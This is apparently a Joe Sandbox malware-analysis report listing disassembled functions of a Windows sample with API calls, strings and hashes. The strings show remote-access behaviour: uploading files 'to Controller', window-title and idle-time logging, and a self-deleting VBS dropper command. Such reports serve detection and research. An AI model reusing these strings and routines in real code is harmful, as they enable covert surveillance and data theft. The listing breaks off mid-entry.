Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18

Function 00411899 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2

Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980

Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5

Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
Sleep.KERNEL32(00000064), ref: 00411C63

Strings

$.F, xrefs: 004119B6
@#G, xrefs: 00411D72
/stext ", xrefs: 0041198C, 00411A2E, 00411ACD
@#G, xrefs: 00411E45

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcess
String ID: /stext "$$.F$@#G$@#G
API String ID: 2485855082-2596709126
Opcode ID: 4800a3cd2ec33f803a84813d2caf4c4f2cd1e11b7b0a82ce0590e4472c4b5f67
Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
Opcode Fuzzy Hash: 4800a3cd2ec33f803a84813d2caf4c4f2cd1e11b7b0a82ce0590e4472c4b5f67
Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A

Function 0044D7E0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044D828
_free.LIBCMT ref: 0044D84C
_free.LIBCMT ref: 0044D859
_free.LIBCMT ref: 0044D87E
_free.LIBCMT ref: 0044D88B
_free.LIBCMT ref: 0044D894
_free.LIBCMT ref: 0044DB72
_free.LIBCMT ref: 0044DB7A

Strings

pF, xrefs: 0044D80E, 0044DAF7

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free
String ID: pF
API String ID: 269201875-2973420481
Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754

Function 004137DC Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
LoadLibraryA.KERNEL32(?), ref: 0041386D
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
FreeLibrary.KERNEL32(00000000), ref: 00413894
LoadLibraryA.KERNEL32(?), ref: 004138CC
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
FreeLibrary.KERNEL32(00000000), ref: 004138E5
GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
FreeLibrary.KERNEL32(00000000), ref: 0041390B

Strings

\wship6, xrefs: 004138B4
\ws2_32, xrefs: 00413855
`3A, xrefs: 00413933
getaddrinfo, xrefs: 004137E9, 00413887, 004138D8

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$`3A$getaddrinfo
API String ID: 2490988753-1607812672
Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE

Function 0041B344 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
GetCursorPos.USER32(?), ref: 0041B39E
SetForegroundWindow.USER32(?), ref: 0041B3A7
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
ExitProcess.KERNEL32 ref: 0041B41A
CreatePopupMenu.USER32 ref: 0041B420
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435

Strings

Close, xrefs: 0041B426

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59

Function 00443268 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004432D8
_free.LIBCMT ref: 004432EE
_free.LIBCMT ref: 004432FF
_free.LIBCMT ref: 00443310
_free.LIBCMT ref: 00443327
GetCPInfo.KERNEL32(?,?), ref: 0044336F

Part of subcall function 00450054: _free.LIBCMT ref: 004500BF

_free.LIBCMT ref: 0044351B
_free.LIBCMT ref: 0044352E
_free.LIBCMT ref: 0044353C
_free.LIBCMT ref: 00443547
_free.LIBCMT ref: 00443589
_free.LIBCMT ref: 00443591
_free.LIBCMT ref: 00443599
_free.LIBCMT ref: 004435A1
_free.LIBCMT ref: 004435AF

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
Opcode Fuzzy Hash: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24

Function 00407BB6 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
__aulldiv.LIBCMT ref: 00407D89

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
CloseHandle.KERNEL32(00000000), ref: 00407FA0
CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
CloseHandle.KERNEL32(00000000), ref: 00408038

Strings

SetFilePointerEx error, xrefs: 00408010
ReadFile error, xrefs: 00408004
Uploading file to Controller: , xrefs: 00407E11

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldiv
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
API String ID: 1656873915-2596673759
Opcode ID: 7a83b8813984d6dadb7c93ecd27c27c1dafacf90928f224cd7c357c47f9d93bc
Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
Opcode Fuzzy Hash: 7a83b8813984d6dadb7c93ecd27c27c1dafacf90928f224cd7c357c47f9d93bc
Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B

Function 0040C3B8 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8

Part of subcall function 004120E8: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
ExitProcess.KERNEL32 ref: 0040C57D

Strings

CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040C520
@8T, xrefs: 0040C3C8
exepath, xrefs: 0040C3EA
.vbs, xrefs: 0040C418
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C4B2
open, xrefs: 0040C56B
Temp, xrefs: 0040C453
""", 0, xrefs: 0040C49A

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$@8T$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-2459740809
Opcode ID: 4e55e68949fade624ef00a0c12fdd6cedf52d5a2f7ca7175f4c8ba38e7bbf390
Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
Opcode Fuzzy Hash: 4e55e68949fade624ef00a0c12fdd6cedf52d5a2f7ca7175f4c8ba38e7bbf390
Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99

Function 00452DBB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00452A89: CreateFileW.KERNEL32(?,00000008,00000007,d.E,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
__dosmaperr.LIBCMT ref: 00452ED6
GetFileType.KERNEL32(00000000), ref: 00452EE2
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
__dosmaperr.LIBCMT ref: 00452EF5
CloseHandle.KERNEL32(00000000), ref: 00452F15
CloseHandle.KERNEL32(00000000), ref: 0045305F
GetLastError.KERNEL32 ref: 00453091
__dosmaperr.LIBCMT ref: 00453098

Strings

H, xrefs: 0045301D

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A

Function 00413606 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

udp, xrefs: 004136B6, 004136BE, 004136C2
65535, xrefs: 00413609

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E

Function 00409C1F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00409C81
Sleep.KERNEL32(000001F4), ref: 00409C8C
GetForegroundWindow.USER32 ref: 00409C92
GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
Sleep.KERNEL32(000003E8), ref: 00409D9D

Part of subcall function 0040962E: SetEvent.KERNEL32(00000000,?,00000000,0040A156,00000000), ref: 0040965A

Strings

[, xrefs: 00409D37
minutes }, xrefs: 00409DC3
{ User has been idle for , xrefs: 00409DCF
], xrefs: 00409D31

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]
API String ID: 911427763-3954389425
Opcode ID: 6ed6bfc40f2a8fca4eab3e118565c47f9c2f2630868c3a4781848372da684854
Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
Opcode Fuzzy Hash: 6ed6bfc40f2a8fca4eab3e118565c47f9c2f2630868c3a4781848372da684854
Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A

Function 0041601D Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F

ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
CloseHandle.KERNEL32(00000000), ref: 00416123
DeleteFileA.KERNEL32(00000000), ref: 00416132

Strings

P0F, xrefs: 004160EE
<, xrefs: 004160C1
@%G, xrefs: 004160F3
@%G, xrefs: 0041615F
@, xrefs: 004160C8
Temp, xrefs: 0041603E

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWait
String ID: <$@$@%G$@%G$P0F$Temp
API String ID: 2516244461-846188940
Opcode ID: 1868534d7fd73e41bc4db1415425d443a43517b2e09c20fc338ca5ac55ad3bcd
Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
Opcode Fuzzy Hash: 1868534d7fd73e41bc4db1415425d443a43517b2e09c20fc338ca5ac55ad3bcd
Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99

Function 004385DA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
__dosmaperr.LIBCMT ref: 00438646
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
__dosmaperr.LIBCMT ref: 00438683
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
__dosmaperr.LIBCMT ref: 004386D7
_free.LIBCMT ref: 004386E3
_free.LIBCMT ref: 004386EA

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
Opcode Fuzzy Hash: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69

Function 0044DC05 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044DC74
_free.LIBCMT ref: 0044DC82
_free.LIBCMT ref: 0044DDB0
_free.LIBCMT ref: 0044DDBB

Strings

pF, xrefs: 0044DC30, 0044DDF5
tF, xrefs: 0044DE0C

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free
String ID: pF$tF
API String ID: 269201875-2954683558
Opcode ID: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
Opcode Fuzzy Hash: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58

Function 00405480 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0040549F
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
TranslateMessage.USER32(?), ref: 0040555E
DispatchMessageA.USER32(?), ref: 00405569
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659

Strings

CloseChat, xrefs: 004055E9
DisplayMessage, xrefs: 004055CC
GetMessage, xrefs: 004055D8

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslate
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2460878853-749203953
Opcode ID: 4f4e66cd07cc992fc44a31c8fe1672d313a345983aa79b6bcdf89a6fe3b89e59
Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
Opcode Fuzzy Hash: 4f4e66cd07cc992fc44a31c8fe1672d313a345983aa79b6bcdf89a6fe3b89e59
Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A

Function 004066A6 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 78COMMON

